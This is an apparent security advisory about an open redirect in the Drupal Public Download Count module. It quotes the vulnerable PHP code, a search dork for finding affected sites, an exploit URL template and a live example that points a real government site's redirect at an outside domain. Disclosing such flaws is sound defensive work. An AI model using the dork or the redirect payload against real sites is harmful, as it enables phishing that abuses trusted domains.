Drupal Public Download Count Module - Open Redirect

2017.06.08
ir Snooper (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-601

# Exploit Title: Drupal Public Download Count Module - Open Redirect # Date: 8-6-2017 # Software Link: https://www.drupal.org/project/pubdlcnt # Exploit Author: Snooper # Contact: https://t.me/Snbig # CWE: CWE-601 # Risk: Low # Category: webapps # Tested on: Kali Linux # Vulnerable File: pubdlcnt.php # Dork: inurl:/sites/all/modules/pubdlcnt/pubdlcnt.php # Version: 7.x-3.1 and lower 1. Description An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it . 2. Vulnerable Code : $url = check_url($_GET['file']); $nid = check_url($_GET['nid']); if (!eregi("^(f|ht)tps?:\/\/.*", $url)) { // check if this is absolute URL // if the URL is relative, then convert it to absolute $url = "http://" . $_SERVER['SERVER_NAME'] . $url; } if (is_valid_file_url($url)) { $filename = basename($url); pubdlcnt_update_counter($url, $filename, $nid); header('Location: ' . $url); exit; 3. Exploit : http://host/sites/all/modules/pubdlcnt/pubdlcnt.php?file=[ Open Redirect Vul ] 4. Example : https://www.stats.gov.sa/sites/all/modules/pubdlcnt/pubdlcnt.php?file=http://leader.ir 5. Solution : Update to version 8.x-1.x-dev https://www.drupal.org/project/download_count/releases/8.x-1.x-dev

References:

https://www.owasp.org/index.php/Open_redirect
https://cwe.mitre.org/data/definitions/601.html


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top